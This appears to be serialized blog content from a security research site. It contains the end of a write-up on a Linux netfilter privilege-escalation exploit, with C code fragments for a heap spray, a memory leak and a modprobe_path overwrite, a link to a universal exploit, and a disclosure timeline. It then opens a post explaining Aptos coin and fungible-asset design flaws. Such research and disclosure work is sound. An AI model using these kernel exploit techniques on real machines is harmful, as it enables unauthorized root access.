for",{"type":28,"tag":116,"props":60197,"children":60198},{"style":266},[60199],{"type":33,"value":269},{"type":28,"tag":116,"props":60201,"children":60202},{"style":376},[60203],{"type":33,"value":18710},{"type":28,"tag":116,"props":60205,"children":60206},{"style":266},[60207],{"type":33,"value":54162},{"type":28,"tag":116,"props":60209,"children":60210},{"style":370},[60211],{"type":33,"value":373},{"type":28,"tag":116,"props":60213,"children":60214},{"style":350},[60215],{"type":33,"value":2718},{"type":28,"tag":116,"props":60217,"children":60218},{"style":266},[60219],{"type":33,"value":50852},{"type":28,"tag":116,"props":60221,"children":60222},{"style":370},[60223],{"type":33,"value":514},{"type":28,"tag":116,"props":60225,"children":60226},{"style":266},[60227],{"type":33,"value":60228}," SKBUF_SPRAY; i",{"type":28,"tag":116,"props":60230,"children":60231},{"style":370},[60232],{"type":33,"value":50888},{"type":28,"tag":116,"props":60234,"children":60235},{"style":266},[60236],{"type":33,"value":2830},{"type":28,"tag":116,"props":60238,"children":60239},{"class":245,"line":1685},[60240],{"type":28,"tag":116,"props":60241,"children":60242},{"style":266},[60243],{"type":33,"value":31308},{"type":28,"tag":116,"props":60245,"children":60246},{"class":245,"line":1729},[60247,60251,60255,60260,60264,60269,60274,60278,60283,60287,60291,60296,60300,60304,60308],{"type":28,"tag":116,"props":60248,"children":60249},{"style":260},[60250],{"type":33,"value":58419},{"type":28,"tag":116,"props":60252,"children":60253},{"style":266},[60254],{"type":33,"value":269},{"type":28,"tag":116,"props":60256,"children":60257},{"style":282},[60258],{"type":33,"value":60259},"read",{"type":28,"tag":116,"props":60261,"children":60262},{"style":266},[60263],{"type":33,"value":313},{"type":28,"tag":116,"props":60265,"children":60266},{"style":272},[60267],{"type":33,"value":60268},"sock",{"type":28,"tag":116,"props":60270,"children":60271},{"style":266},[60272],{"type":33,"value":60273},"[i][",{"type":28,"tag":116,"props":60275,"children":60276},{"style":350},[60277],{"type":33,"value":1824},{"type":28,"tag":116,"props":60279,"children":60280},{"style":266},[60281],{"type":33,"value":60282},"], leak, ",{"type":28,"tag":116,"props":60284,"children":60285},{"style":350},[60286],{"type":33,"value":57766},{"type":28,"tag":116,"props":60288,"children":60289},{"style":370},[60290],{"type":33,"value":50874},{"type":28,"tag":116,"props":60292,"children":60293},{"style":350},[60294],{"type":33,"value":60295}," 320",{"type":28,"tag":116,"props":60297,"children":60298},{"style":266},[60299],{"type":33,"value":1609},{"type":28,"tag":116,"props":60301,"children":60302},{"style":370},[60303],{"type":33,"value":514},{"type":28,"tag":116,"props":60305,"children":60306},{"style":350},[60307],{"type":33,"value":2718},{"type":28,"tag":116,"props":60309,"children":60310},{"style":266},[60311],{"type":33,"value":2830},{"type":28,"tag":116,"props":60313,"children":60314},{"class":245,"line":1764},[60315],{"type":28,"tag":116,"props":60316,"children":60317},{"style":266},[60318],{"type":33,"value":31344},{"type":28,"tag":116,"props":60320,"children":60321},{"class":245,"line":1896},[60322,60327,60331,60336],{"type":28,"tag":116,"props":60323,"children":60324},{"style":282},[60325],{"type":33,"value":60326},"                perror",{"type":28,"tag":116,"props":60328,"children":60329},{"style":266},[60330],{"type":33,"value":313},{"type":28,"tag":116,"props":60332,"children":60333},{"style":563},[60334],{"type":33,"value":60335},"\"[-] read(socket)\"",{"type":28,"tag":116,"props":60337,"children":60338},{"style":266},[60339],{"type":33,"value":895},{"type":28,"tag":116,"props":60341,"children":60342},{"class":245,"line":1932},[60343,60348,60352,60356],{"type":28,"tag":116,"props":60344,"children":60345},{"style":260},[60346],{"type":33,"value":60347},"                return",{"type":28,"tag":116,"props":60349,"children":60350},{"style":370},[60351],{"type":33,"value":50874},{"type":28,"tag":116,"props":60353,"children":60354},{"style":350},[60355],{"type":33,"value":1824},{"type":28,"tag":116,"props":60357,"children":60358},{"style":266},[60359],{"type":33,"value":384},{"type":28,"tag":116,"props":60361,"children":60362},{"class":245,"line":1940},[60363],{"type":28,"tag":116,"props":60364,"children":60365},{"style":266},[60366],{"type":33,"value":58503},{"type":28,"tag":116,"props":60368,"children":60369},{"class":245,"line":1948},[60370],{"type":28,"tag":116,"props":60371,"children":60372},{"style":266},[60373],{"type":33,"value":1954},{"type":28,"tag":116,"props":60375,"children":60376},{"class":245,"line":1957},[60377],{"type":28,"tag":116,"props":60378,"children":60379},{"style":266},[60380],{"type":33,"value":3025},{"type":28,"tag":116,"props":60382,"children":60383},{"class":245,"line":1970},[60384,60388,60392,60397],{"type":28,"tag":116,"props":60385,"children":60386},{"style":282},[60387],{"type":33,"value":55125},{"type":28,"tag":116,"props":60389,"children":60390},{"style":266},[60391],{"type":33,"value":313},{"type":28,"tag":116,"props":60393,"children":60394},{"style":563},[60395],{"type":33,"value":60396},"\"[-] fake modprobe failed\"",{"type":28,"tag":116,"props":60398,"children":60399},{"style":266},[60400],{"type":33,"value":895},{"type":28,"tag":116,"props":60402,"children":60403},{"class":245,"line":1987},[60404],{"type":28,"tag":116,"props":60405,"children":60406},{"style":266},[60407],{"type":33,"value":9986},{"type":28,"tag":29,"props":60409,"children":60410},{},[60411,60413,60420],{"type":33,"value":60412},"This trick has already been throughly detailed by ",{"type":28,"tag":87,"props":60414,"children":60417},{"href":60415,"rel":60416},"https://pwning.tech/nftables/#28-overwriting-modprobepath",[91],[60418],{"type":33,"value":60419},"lau",{"type":33,"value":60421},", so we won't go much more into it.",{"type":28,"tag":75,"props":60423,"children":60425},{"id":60424},"universal-exploit-demo",[60426],{"type":33,"value":60427},"Universal exploit demo",{"type":28,"tag":29,"props":60429,"children":60430},{},[60431,60433,60439],{"type":33,"value":60432},"{%youtube tjbp4Mtfo8w %}\nYou can find the complete universal exploit in our ",{"type":28,"tag":87,"props":60434,"children":60437},{"href":60435,"rel":60436},"https://github.com/otter-sec/OtterRoot/blob/master/universal/exploit.c",[91],[60438],{"type":33,"value":57034},{"type":33,"value":141},{"type":28,"tag":63,"props":60441,"children":60443},{"id":60442},"disclosure-timeline",[60444],{"type":33,"value":60445},"Disclosure Timeline",{"type":28,"tag":2108,"props":60447,"children":60448},{},[60449,60454,60459,60464,60469],{"type":28,"tag":459,"props":60450,"children":60451},{},[60452],{"type":33,"value":60453},"March 21st -- Patch made public",{"type":28,"tag":459,"props":60455,"children":60456},{},[60457],{"type":33,"value":60458},"March 23rd -- Scrolled through commits and found the bug fix.",{"type":28,"tag":459,"props":60460,"children":60461},{},[60462],{"type":33,"value":60463},"March 24th -- Wrote KernelCTF exploit",{"type":28,"tag":459,"props":60465,"children":60466},{},[60467],{"type":33,"value":60468},"March 26th -- Wrote Universal exploit",{"type":28,"tag":459,"props":60470,"children":60471},{},[60472],{"type":33,"value":60473},"May 23rd -- Patch landed on Ubuntu and Debian",{"type":28,"tag":29,"props":60475,"children":60476},{},[60477],{"type":33,"value":60478},"Note that the universal exploit was alive for roughly 2 months against popular distros.",{"type":28,"tag":63,"props":60480,"children":60481},{"id":2506},[60482],{"type":33,"value":2509},{"type":28,"tag":29,"props":60484,"children":60485},{},[60486],{"type":33,"value":60487},"In this post, I have discussed how a bug fixed by a commit freshly made public can be used to exploit the latest stable releases of the kernel and maintain 0day-like primitives for an extended period. I've also discussed two different paths to exploit the vulnerability: one that I used to exploit the KernelCTF instance and retrieve the flag and a second one that I used to craft a universal exploit binary that works stably in all tested targets without needing to be adapted or even recompiled.",{"type":28,"tag":29,"props":60489,"children":60490},{},[60491],{"type":33,"value":60492},"What we have observed is not novel; despite the efforts and progress made by the Linux community to improve kernel security, it's been made evident that the supply of exploitable bugs is still virtually unlimited and that the open-source patch gap is long enough to maintain capabilities that are live.",{"type":28,"tag":2516,"props":60494,"children":60495},{},[60496],{"type":33,"value":2520},{"title":7,"searchDepth":256,"depth":256,"links":60498},[60499,60502,60505,60508,60509,60519,60527,60528],{"id":50187,"depth":256,"text":50190,"children":60500},[60501],{"id":50208,"depth":293,"text":50211},{"id":50251,"depth":256,"text":50251,"children":60503},[60504],{"id":50298,"depth":293,"text":50301},{"id":50356,"depth":256,"text":50359,"children":60506},[60507],{"id":51517,"depth":293,"text":51520},{"id":53392,"depth":256,"text":53395},{"id":53794,"depth":256,"text":53797,"children":60510},[60511,60512,60513,60515,60516,60517,60518],{"id":53821,"depth":293,"text":53824},{"id":54703,"depth":293,"text":54706},{"id":55289,"depth":293,"text":60514},"Leaking self pointer of nft_object",{"id":55687,"depth":293,"text":55690},{"id":56201,"depth":293,"text":56204},{"id":56331,"depth":293,"text":55988},{"id":57015,"depth":293,"text":57018},{"id":57038,"depth":256,"text":57041,"children":60520},[60521,60522,60523,60524,60526],{"id":57049,"depth":293,"text":57052},{"id":57906,"depth":293,"text":57909},{"id":57982,"depth":293,"text":57985},{"id":59607,"depth":293,"text":60525},"Overwriting modprobe_path",{"id":60424,"depth":293,"text":60427},{"id":60442,"depth":256,"text":60445},{"id":2506,"depth":256,"text":2509},"content:blog:2024-11-25-netfilter-universal-root-1-day.md","blog/2024-11-25-netfilter-universal-root-1-day.md","blog/2024-11-25-netfilter-universal-root-1-day",{"_path":60533,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":60534,"description":60535,"image":60536,"date":60538,"isFeatured":19,"onBlogPage":19,"tags":60539,"body":60540,"_type":2534,"_id":67258,"_source":2536,"_file":67259,"_stem":67260,"_extension":2539},"/blog/2025-02-10-hitchhikers-guide-to-aptos-fungible-assets","Hitchhiker's Guide to Aptos Fungible Assets","We take a deep dive into Aptos’ implementation of fungible assets, exploring the intricacies hidden within its functions, objects, and interactions. While the Fungible Asset model was designed to address the limitations and security flaws of the legacy Coin standard, it also introduced new challenges and vulnerabilities that developers should be aware of.",{"src":60537,"width":5056,"height":5057},"/posts/aptos-guide/title.png","2025-02-10",[5551],{"type":25,"children":60541,"toc":67242},[60542,60555,60560,60569,60575,60603,60676,60716,60750,60911,60930,61011,61051,61079,61096,61101,61109,61114,61120,61141,61221,61254,61262,61275,61280,61664,61669,61674,61680,61685,61697,61801,61839,61842,61860,62168,62173,62185,62191,62217,62238,62243,62422,62442,62448,62468,62480,62485,62491,62503,62566,62593,62617,62838,62841,62860,62970,63027,63163,63190,63196,63222,63466,63494,63796,63829,63843,63869,63902,64209,64221,64498,64512,64829,64848,64854,64886,64926,65027,65047,65167,65184,65258,65270,65358,65379,65385,65390,65395,65412,65433,65804,65863,65868,66319,66324,66360,66366,66378,66400,66426,66633,66647,66902,66914,66941,67092,67111,67141,67145,67156,67161,67174,67238],{"type":28,"tag":29,"props":60543,"children":60544},{},[60545,60547,60553],{"type":33,"value":60546},"Aptos’ fungible asset model is a complex component of its ecosystem, designed to address the limitations of its predecessor — the ",{"type":28,"tag":98,"props":60548,"children":60550},{"className":60549},[],[60551],{"type":33,"value":60552},"coin",{"type":33,"value":60554}," standard. While the new model aims to enhance functionality and security, it also comes with its own set of challenges.",{"type":28,"tag":29,"props":60556,"children":60557},{},[60558],{"type":33,"value":60559},"In this blog post, we'll closely examine Aptos's coin and fungible asset models, exploring their history and connection. We will examine key aspects of the fungible asset framework, including real-world examples of vulnerabilities that were identified and addressed, with the goal of improving security and reliability — all to help you build more secure and reliable applications.",{"type":28,"tag":60561,"props":60562,"children":60563},"important",{},[60564],{"type":28,"tag":29,"props":60565,"children":60566},{},[60567],{"type":33,"value":60568},"All issues mentioned were identified and addressed during Aptos' rigorous pre-release audits, demonstrating the project's dedication to delivering a robust and secure environment from day one.",{"type":28,"tag":63,"props":60570,"children":60572},{"id":60571},"aptos-coin-standard",[60573],{"type":33,"value":60574},"Aptos Coin standard",{"type":28,"tag":29,"props":60576,"children":60577},{},[60578,60580,60586,60588,60593,60594,60601],{"type":33,"value":60579},"In the beginning, Aptos used ",{"type":28,"tag":98,"props":60581,"children":60583},{"className":60582},[],[60584],{"type":33,"value":60585},"Coin",{"type":33,"value":60587},". It is still in use, although it is now considered \"legacy\". ",{"type":28,"tag":98,"props":60589,"children":60591},{"className":60590},[],[60592],{"type":33,"value":60585},{"type":33,"value":5172},{"type":28,"tag":87,"props":60595,"children":60598},{"href":60596,"rel":60597},"https://github.com/aptos-labs/aptos-core/blob/1381c93fd5a656f16fb326d4ffe371947554a330/aptos-move/framework/aptos-framework/sources/coin.move#L119-L123",[91],[60599],{"type":33,"value":60600},"defined",{"type":33,"value":60602}," in Aptos as follows:",{"type":28,"tag":234,"props":60604,"children":60606},{"className":2652,"code":60605,"language":2651,"meta":7,"style":7},"struct Coin\u003Cphantom CoinType> has store {\n    value: u64,\n}\n",[60607],{"type":28,"tag":98,"props":60608,"children":60609},{"__ignoreMap":7},[60610,60649,60669],{"type":28,"tag":116,"props":60611,"children":60612},{"class":245,"line":246},[60613,60617,60621,60625,60629,60633,60637,60641,60645],{"type":28,"tag":116,"props":60614,"children":60615},{"style":376},[60616],{"type":33,"value":9069},{"type":28,"tag":116,"props":60618,"children":60619},{"style":339},[60620],{"type":33,"value":5473},{"type":28,"tag":116,"props":60622,"children":60623},{"style":266},[60624],{"type":33,"value":514},{"type":28,"tag":116,"props":60626,"children":60627},{"style":272},[60628],{"type":33,"value":5482},{"type":28,"tag":116,"props":60630,"children":60631},{"style":339},[60632],{"type":33,"value":5487},{"type":28,"tag":116,"props":60634,"children":60635},{"style":266},[60636],{"type":33,"value":5492},{"type":28,"tag":116,"props":60638,"children":60639},{"style":272},[60640],{"type":33,"value":5497},{"type":28,"tag":116,"props":60642,"children":60643},{"style":272},[60644],{"type":33,"value":5502},{"type":28,"tag":116,"props":60646,"children":60647},{"style":266},[60648],{"type":33,"value":1291},{"type":28,"tag":116,"props":60650,"children":60651},{"class":245,"line":256},[60652,60657,60661,60665],{"type":28,"tag":116,"props":60653,"children":60654},{"style":272},[60655],{"type":33,"value":60656},"    value",{"type":28,"tag":116,"props":60658,"children":60659},{"style":370},[60660],{"type":33,"value":4160},{"type":28,"tag":116,"props":60662,"children":60663},{"style":339},[60664],{"type":33,"value":5531},{"type":28,"tag":116,"props":60666,"children":60667},{"style":266},[60668],{"type":33,"value":3178},{"type":28,"tag":116,"props":60670,"children":60671},{"class":245,"line":293},[60672],{"type":28,"tag":116,"props":60673,"children":60674},{"style":266},[60675],{"type":33,"value":406},{"type":28,"tag":29,"props":60677,"children":60678},{},[60679,60681,60686,60688,60694,60695,60701,60703,60708,60710,60715],{"type":33,"value":60680},"Aptos distinguishes coins by their type (",{"type":28,"tag":98,"props":60682,"children":60684},{"className":60683},[],[60685],{"type":33,"value":6255},{"type":33,"value":60687},") at compile time. For example, ",{"type":28,"tag":98,"props":60689,"children":60691},{"className":60690},[],[60692],{"type":33,"value":60693},"Coin\u003COtter>",{"type":33,"value":10659},{"type":28,"tag":98,"props":60696,"children":60698},{"className":60697},[],[60699],{"type":33,"value":60700},"Coin\u003CWeasel>",{"type":33,"value":60702}," represent different coins, and you cannot pass a ",{"type":28,"tag":98,"props":60704,"children":60706},{"className":60705},[],[60707],{"type":33,"value":60700},{"type":33,"value":60709}," to a function expecting ",{"type":28,"tag":98,"props":60711,"children":60713},{"className":60712},[],[60714],{"type":33,"value":60693},{"type":33,"value":141},{"type":28,"tag":29,"props":60717,"children":60718},{},[60719,60721,60726,60728,60733,60735,60740,60742,60748],{"type":33,"value":60720},"The type signature reveals why ",{"type":28,"tag":98,"props":60722,"children":60724},{"className":60723},[],[60725],{"type":33,"value":60585},{"type":33,"value":60727}," has become a legacy standard. ",{"type":28,"tag":98,"props":60729,"children":60731},{"className":60730},[],[60732],{"type":33,"value":60585},{"type":33,"value":60734}," has only the ",{"type":28,"tag":98,"props":60736,"children":60738},{"className":60737},[],[60739],{"type":33,"value":5612},{"type":33,"value":60741}," ability and uses a ",{"type":28,"tag":98,"props":60743,"children":60745},{"className":60744},[],[60746],{"type":33,"value":60747},"CoinStore",{"type":33,"value":60749}," wrapper to store the coin and metadata:",{"type":28,"tag":234,"props":60751,"children":60753},{"className":2652,"code":60752,"language":2651,"meta":7,"style":7},"struct CoinStore\u003Cphantom CoinType> has key {\n    coin: Coin\u003CCoinType>,\n    frozen: bool,\n    deposit_events: EventHandle\u003CDepositEvent>,\n    withdraw_events: EventHandle\u003CWithdrawEvent>,\n}\n",[60754],{"type":28,"tag":98,"props":60755,"children":60756},{"__ignoreMap":7},[60757,60797,60825,60845,60875,60904],{"type":28,"tag":116,"props":60758,"children":60759},{"class":245,"line":246},[60760,60764,60769,60773,60777,60781,60785,60789,60793],{"type":28,"tag":116,"props":60761,"children":60762},{"style":376},[60763],{"type":33,"value":9069},{"type":28,"tag":116,"props":60765,"children":60766},{"style":339},[60767],{"type":33,"value":60768}," CoinStore",{"type":28,"tag":116,"props":60770,"children":60771},{"style":266},[60772],{"type":33,"value":514},{"type":28,"tag":116,"props":60774,"children":60775},{"style":272},[60776],{"type":33,"value":5482},{"type":28,"tag":116,"props":60778,"children":60779},{"style":339},[60780],{"type":33,"value":5487},{"type":28,"tag":116,"props":60782,"children":60783},{"style":266},[60784],{"type":33,"value":5492},{"type":28,"tag":116,"props":60786,"children":60787},{"style":272},[60788],{"type":33,"value":5497},{"type":28,"tag":116,"props":60790,"children":60791},{"style":272},[60792],{"type":33,"value":5603},{"type":28,"tag":116,"props":60794,"children":60795},{"style":266},[60796],{"type":33,"value":1291},{"type":28,"tag":116,"props":60798,"children":60799},{"class":245,"line":256},[60800,60805,60809,60813,60817,60821],{"type":28,"tag":116,"props":60801,"children":60802},{"style":272},[60803],{"type":33,"value":60804},"    coin",{"type":28,"tag":116,"props":60806,"children":60807},{"style":370},[60808],{"type":33,"value":4160},{"type":28,"tag":116,"props":60810,"children":60811},{"style":339},[60812],{"type":33,"value":5473},{"type":28,"tag":116,"props":60814,"children":60815},{"style":266},[60816],{"type":33,"value":514},{"type":28,"tag":116,"props":60818,"children":60819},{"style":339},[60820],{"type":33,"value":6255},{"type":28,"tag":116,"props":60822,"children":60823},{"style":266},[60824],{"type":33,"value":5809},{"type":28,"tag":116,"props":60826,"children":60827},{"class":245,"line":293},[60828,60833,60837,60841],{"type":28,"tag":116,"props":60829,"children":60830},{"style":272},[60831],{"type":33,"value":60832},"    frozen",{"type":28,"tag":116,"props":60834,"children":60835},{"style":370},[60836],{"type":33,"value":4160},{"type":28,"tag":116,"props":60838,"children":60839},{"style":339},[60840],{"type":33,"value":11718},{"type":28,"tag":116,"props":60842,"children":60843},{"style":266},[60844],{"type":33,"value":3178},{"type":28,"tag":116,"props":60846,"children":60847},{"class":245,"line":361},[60848,60853,60857,60862,60866,60871],{"type":28,"tag":116,"props":60849,"children":60850},{"style":272},[60851],{"type":33,"value":60852},"    deposit_events",{"type":28,"tag":116,"props":60854,"children":60855},{"style":370},[60856],{"type":33,"value":4160},{"type":28,"tag":116,"props":60858,"children":60859},{"style":339},[60860],{"type":33,"value":60861}," EventHandle",{"type":28,"tag":116,"props":60863,"children":60864},{"style":266},[60865],{"type":33,"value":514},{"type":28,"tag":116,"props":60867,"children":60868},{"style":339},[60869],{"type":33,"value":60870},"DepositEvent",{"type":28,"tag":116,"props":60872,"children":60873},{"style":266},[60874],{"type":33,"value":5809},{"type":28,"tag":116,"props":60876,"children":60877},{"class":245,"line":387},[60878,60883,60887,60891,60895,60900],{"type":28,"tag":116,"props":60879,"children":60880},{"style":272},[60881],{"type":33,"value":60882},"    withdraw_events",{"type":28,"tag":116,"props":60884,"children":60885},{"style":370},[60886],{"type":33,"value":4160},{"type":28,"tag":116,"props":60888,"children":60889},{"style":339},[60890],{"type":33,"value":60861},{"type":28,"tag":116,"props":60892,"children":60893},{"style":266},[60894],{"type":33,"value":514},{"type":28,"tag":116,"props":60896,"children":60897},{"style":339},[60898],{"type":33,"value":60899},"WithdrawEvent",{"type":28,"tag":116,"props":60901,"children":60902},{"style":266},[60903],{"type":33,"value":5809},{"type":28,"tag":116,"props":60905,"children":60906},{"class":245,"line":400},[60907],{"type":28,"tag":116,"props":60908,"children":60909},{"style":266},[60910],{"type":33,"value":406},{"type":28,"tag":29,"props":60912,"children":60913},{},[60914,60916,60921,60923,60928],{"type":33,"value":60915},"However, an astute reader would note that this isn't the only place a ",{"type":28,"tag":98,"props":60917,"children":60919},{"className":60918},[],[60920],{"type":33,"value":60585},{"type":33,"value":60922}," can be stored. You can create your own ",{"type":28,"tag":98,"props":60924,"children":60926},{"className":60925},[],[60927],{"type":33,"value":60585},{"type":33,"value":60929}," wallet, which could look like this:",{"type":28,"tag":234,"props":60931,"children":60933},{"className":2652,"code":60932,"language":2651,"meta":7,"style":7},"struct DefinitelyLegitCoinStore\u003Cphantom CoinType> has key {\n    coin: Coin\u003CCoinType>\n}\n",[60934],{"type":28,"tag":98,"props":60935,"children":60936},{"__ignoreMap":7},[60937,60977,61004],{"type":28,"tag":116,"props":60938,"children":60939},{"class":245,"line":246},[60940,60944,60949,60953,60957,60961,60965,60969,60973],{"type":28,"tag":116,"props":60941,"children":60942},{"style":376},[60943],{"type":33,"value":9069},{"type":28,"tag":116,"props":60945,"children":60946},{"style":339},[60947],{"type":33,"value":60948}," DefinitelyLegitCoinStore",{"type":28,"tag":116,"props":60950,"children":60951},{"style":266},[60952],{"type":33,"value":514},{"type":28,"tag":116,"props":60954,"children":60955},{"style":272},[60956],{"type":33,"value":5482},{"type":28,"tag":116,"props":60958,"children":60959},{"style":339},[60960],{"type":33,"value":5487},{"type":28,"tag":116,"props":60962,"children":60963},{"style":266},[60964],{"type":33,"value":5492},{"type":28,"tag":116,"props":60966,"children":60967},{"style":272},[60968],{"type":33,"value":5497},{"type":28,"tag":116,"props":60970,"children":60971},{"style":272},[60972],{"type":33,"value":5603},{"type":28,"tag":116,"props":60974,"children":60975},{"style":266},[60976],{"type":33,"value":1291},{"type":28,"tag":116,"props":60978,"children":60979},{"class":245,"line":256},[60980,60984,60988,60992,60996,61000],{"type":28,"tag":116,"props":60981,"children":60982},{"style":272},[60983],{"type":33,"value":60804},{"type":28,"tag":116,"props":60985,"children":60986},{"style":370},[60987],{"type":33,"value":4160},{"type":28,"tag":116,"props":60989,"children":60990},{"style":339},[60991],{"type":33,"value":5473},{"type":28,"tag":116,"props":60993,"children":60994},{"style":266},[60995],{"type":33,"value":514},{"type":28,"tag":116,"props":60997,"children":60998},{"style":339},[60999],{"type":33,"value":6255},{"type":28,"tag":116,"props":61001,"children":61002},{"style":266},[61003],{"type":33,"value":506},{"type":28,"tag":116,"props":61005,"children":61006},{"class":245,"line":293},[61007],{"type":28,"tag":116,"props":61008,"children":61009},{"style":266},[61010],{"type":33,"value":406},{"type":28,"tag":29,"props":61012,"children":61013},{},[61014,61019,61021,61027,61029,61034,61036,61042,61044,61049],{"type":28,"tag":98,"props":61015,"children":61017},{"className":61016},[],[61018],{"type":33,"value":60747},{"type":33,"value":61020}," includes a ",{"type":28,"tag":98,"props":61022,"children":61024},{"className":61023},[],[61025],{"type":33,"value":61026},"frozen",{"type":33,"value":61028}," field, allowing the issuer to block transfers to and from the store. ",{"type":28,"tag":98,"props":61030,"children":61032},{"className":61031},[],[61033],{"type":33,"value":60747},{"type":33,"value":61035}," is also required for a ",{"type":28,"tag":98,"props":61037,"children":61039},{"className":61038},[],[61040],{"type":33,"value":61041},"burn_from",{"type":33,"value":61043}," operation, which withdraws the ",{"type":28,"tag":98,"props":61045,"children":61047},{"className":61046},[],[61048],{"type":33,"value":60552},{"type":33,"value":61050}," from the store and destroys it. Freezing and burning operations are essential i.e. for stablecoin issuers, using them as compliance tools to prevent unauthorized or illegal transactions and adhere to legal orders. Being able to bypass these restrictions with a custom wallet is an issue and can lead to severe consequences.",{"type":28,"tag":29,"props":61052,"children":61053},{},[61054,61056,61061,61063,61070,61072,61077],{"type":33,"value":61055},"Storing ",{"type":28,"tag":98,"props":61057,"children":61059},{"className":61058},[],[61060],{"type":33,"value":60552},{"type":33,"value":61062}," in a custom wallet is also a problem in terms of off-chain observability, as finding the stored coins in such setup is a difficult task. This is how the fungible asset ",{"type":28,"tag":87,"props":61064,"children":61067},{"href":61065,"rel":61066},"https://github.com/aptos-foundation/AIPs/blob/ac3da48db226cf2dbaf4df6f1f5109a4f1b2e604/aips/aip-21.md",[91],[61068],{"type":33,"value":61069},"AIP-21",{"type":33,"value":61071}," summarizes the ",{"type":28,"tag":98,"props":61073,"children":61075},{"className":61074},[],[61076],{"type":33,"value":60552},{"type":33,"value":61078}," problems:",{"type":28,"tag":107,"props":61080,"children":61081},{},[61082,61091],{"type":28,"tag":29,"props":61083,"children":61084},{},[61085,61089],{"type":28,"tag":116,"props":61086,"children":61087},{},[61088],{"type":33,"value":9259},{"type":33,"value":61090}," coin module has been deemed insufficient for current and future needs due to the rigidity of Move structs and the inherently poor extensibility.",{"type":28,"tag":29,"props":61092,"children":61093},{},[61094],{"type":33,"value":61095},"The existing Coin struct leverages the store ability allowing for assets on-chain to become untraceable. Creating challenges to off-chain observability and on-chain management, such as freezing or burning.",{"type":28,"tag":29,"props":61097,"children":61098},{},[61099],{"type":33,"value":61100},"And declares, that:",{"type":28,"tag":107,"props":61102,"children":61103},{},[61104],{"type":28,"tag":29,"props":61105,"children":61106},{},[61107],{"type":33,"value":61108},"Fungible assets addresses these issues.",{"type":28,"tag":29,"props":61110,"children":61111},{},[61112],{"type":33,"value":61113},"Let's find out whether this is indeed the case.",{"type":28,"tag":63,"props":61115,"children":61117},{"id":61116},"the-fungible-assets",[61118],{"type":33,"value":61119},"The fungible assets",{"type":28,"tag":29,"props":61121,"children":61122},{},[61123,61125,61131,61133,61140],{"type":33,"value":61124},"Aptos designed fungible assets as a new token standard to solve these problems. A ",{"type":28,"tag":98,"props":61126,"children":61128},{"className":61127},[],[61129],{"type":33,"value":61130},"FungibleAsset",{"type":33,"value":61132}," uses the ",{"type":28,"tag":87,"props":61134,"children":61137},{"href":61135,"rel":61136},"https://medium.com/@borispovod/move-hot-potato-pattern-bbc48a48d93c",[91],[61138],{"type":33,"value":61139},"hot-potato pattern",{"type":33,"value":4160},{"type":28,"tag":234,"props":61142,"children":61144},{"className":2652,"code":61143,"language":2651,"meta":7,"style":7},"struct FungibleAsset {\n    metadata: Object\u003CMetadata>,\n    amount: u64,\n}\n",[61145],{"type":28,"tag":98,"props":61146,"children":61147},{"__ignoreMap":7},[61148,61164,61194,61214],{"type":28,"tag":116,"props":61149,"children":61150},{"class":245,"line":246},[61151,61155,61160],{"type":28,"tag":116,"props":61152,"children":61153},{"style":376},[61154],{"type":33,"value":9069},{"type":28,"tag":116,"props":61156,"children":61157},{"style":339},[61158],{"type":33,"value":61159}," FungibleAsset",{"type":28,"tag":116,"props":61161,"children":61162},{"style":266},[61163],{"type":33,"value":1291},{"type":28,"tag":116,"props":61165,"children":61166},{"class":245,"line":256},[61167,61172,61176,61181,61185,61190],{"type":28,"tag":116,"props":61168,"children":61169},{"style":272},[61170],{"type":33,"value":61171},"    metadata",{"type":28,"tag":116,"props":61173,"children":61174},{"style":370},[61175],{"type":33,"value":4160},{"type":28,"tag":116,"props":61177,"children":61178},{"style":339},[61179],{"type":33,"value":61180}," Object",{"type":28,"tag":116,"props":61182,"children":61183},{"style":266},[61184],{"type":33,"value":514},{"type":28,"tag":116,"props":61186,"children":61187},{"style":339},[61188],{"type":33,"value":61189},"Metadata",{"type":28,"tag":116,"props":61191,"children":61192},{"style":266},[61193],{"type":33,"value":5809},{"type":28,"tag":116,"props":61195,"children":61196},{"class":245,"line":293},[61197,61202,61206,61210],{"type":28,"tag":116,"props":61198,"children":61199},{"style":272},[61200],{"type":33,"value":61201},"    amount",{"type":28,"tag":116,"props":61203,"children":61204},{"style":370},[61205],{"type":33,"value":4160},{"type":28,"tag":116,"props":61207,"children":61208},{"style":339},[61209],{"type":33,"value":5531},{"type":28,"tag":116,"props":61211,"children":61212},{"style":266},[61213],{"type":33,"value":3178},{"type":28,"tag":116,"props":61215,"children":61216},{"class":245,"line":361},[61217],{"type":28,"tag":116,"props":61218,"children":61219},{"style":266},[61220],{"type":33,"value":406},{"type":28,"tag":29,"props":61222,"children":61223},{},[61224,61226,61231,61232,61237,61239,61244,61246,61253],{"type":33,"value":61225},"Unlike ",{"type":28,"tag":98,"props":61227,"children":61229},{"className":61228},[],[61230],{"type":33,"value":60585},{"type":33,"value":825},{"type":28,"tag":98,"props":61233,"children":61235},{"className":61234},[],[61236],{"type":33,"value":61130},{"type":33,"value":61238}," types are defined at runtime through the ",{"type":28,"tag":98,"props":61240,"children":61242},{"className":61241},[],[61243],{"type":33,"value":61189},{"type":33,"value":61245}," field. This change was meant to ",{"type":28,"tag":87,"props":61247,"children":61250},{"href":61248,"rel":61249},"https://github.com/aptos-foundation/AIPs/blob/main/aips/aip-21.md#specification",[91],[61251],{"type":33,"value":61252},"enhance extensibility",{"type":33,"value":4160},{"type":28,"tag":107,"props":61255,"children":61256},{},[61257],{"type":28,"tag":29,"props":61258,"children":61259},{},[61260],{"type":33,"value":61261},"An object can have other resources attached to provide additional context. For example, the metadata could define a gem of a given type, color, quality, and rarity, where ownership indicates the quantity or total weight owned of that type of gem.",{"type":28,"tag":29,"props":61263,"children":61264},{},[61265,61267,61273],{"type":33,"value":61266},"An important implication is that functions accepting ",{"type":28,"tag":98,"props":61268,"children":61270},{"className":61269},[],[61271],{"type":33,"value":61272},"FungibleAssets",{"type":33,"value":61274}," must verify the metadata to ensure valid assets.",{"type":28,"tag":29,"props":61276,"children":61277},{},[61278],{"type":33,"value":61279},"Let's consider a possible implementation of a protocol that takes in assets.",{"type":28,"tag":234,"props":61281,"children":61283},{"className":2652,"code":61282,"language":2651,"meta":7,"style":7},"public fun deposit\u003CT: key>(\n    sender: &signer, fa: FungibleAsset\n) acquires [...] {\n    assert_not_paused();\n    \n    let fa_amount = fungible_asset::amount(&fa);\n    let sender_address = address_of(sender);\n    check_compliance(fa_amount, sender_address);\n    \n    increase_deposit(get_vault(sender_address), fa_amount);\n    \n    